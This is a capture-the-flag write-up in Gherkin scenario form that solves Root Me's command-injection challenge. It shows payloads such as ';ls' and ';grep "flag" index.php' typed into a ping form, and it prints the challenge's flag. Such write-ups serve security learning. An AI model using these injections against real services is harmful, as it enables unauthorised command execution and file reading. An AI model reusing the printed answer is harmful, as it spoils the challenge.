Feature: Solve Command injection
  From the Root Me site
  Category Web-Server
  With my username vanem_cb

  Background:
    Given I am running Windows 10 (64 bits)
    And I am using Google Chrome Version 70.0.3538.77 (Build oficial) (64 bits)

  Scenario: Normal use case
    Given the challenge URL
    """
    https://www.root-me.org/en/Challenges/Web-Server/Command-injection
    """
    Then I opened the URL with Google Chrome
    And I see the challenge statement
    """
    Find a vulnerabilty in this service and exploit it.
    The flag is on the index.php file.
    """
    And I see the input field to submit the answer
    And I see a button
    """
    Start the challenge
    """
    When I click the button
    Then a chrome tab is open whith a new URL
    """
    http://challenge01.root-me.org/web-serveur/ch54/
    """
    And I see a text box
    And I see a button at right side the text box
    """
    Enviar
    """
    When I click the button
    Then nothing happens
    And I don't write nothing in the input field to submit the answer
    And I don't solve the challenge
    But I conclude that I must see the URL's source code

  Scenario: Failed Attempt number 1
    Given a Chrome tab with a new URL by clicking the button
    """
    http://challenge01.root-me.org/web-serveur/ch54/
    """
    Then I open Google Chrome developer tools
    And I see the URL's source code
    And I look for the flag
    But I don't find anything related to the flag
    Then I see that the text box has an element type "placeholder"
    """
    <input type="text" name="ip" placeholder="127.0.0.1">
    """
    And I guess that I must write "127.0.0.1" in the text box
    Then I write it
    And I click the button "Enviar"
    And a new text appears
    """
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.058 ms
    64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.036 ms
    64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.337 ms

    --- 127.0.0.1 ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 1998ms
    rtt min/avg/max/mdev = 0.036/0.143/0.337/0.137 ms
    """
    But nothing is related to the flag
    Then I don't write nothing in the input field to submit the answer
    And I don't solve the challenge
    But I conclude that I must research about "command injection"

  Scenario: Successful solution
    Given a Chrome tab with a new URL by clicking the button
    """
    http://challenge01.root-me.org/web-serveur/ch54/
    """
    Then I research about "command injection"
    And I find information about commands in Linux/Unix
    And I write the command ";ls" in the text box
    And I click the button "Enviar"
    And a new text appears
    """
    index.php
    """
    Then I repeat the same pocedure with the command ";ls -a"
    And I see the hidden elements
    """
    .
    ..
    ._nginx.http-level.inc
    ._nginx.server-level.inc
    ._php-fpm.pool.inc
    index.php
    """
    But I don't find anything related to the flag
    Then I realize that I should look for on the index.php file
    And I research about a command that Linux/Unix uses to look for a string
    And I decide to use the command "grep" in the text box
    """
    ;grep "flag" index.php
    """
    And a new text appears
    """
    $flag = "S3rv1ceP1n9Sup3rS3cure";
    """
    Then I write the flag in the input field to submit the answer
    And I solve the challenge
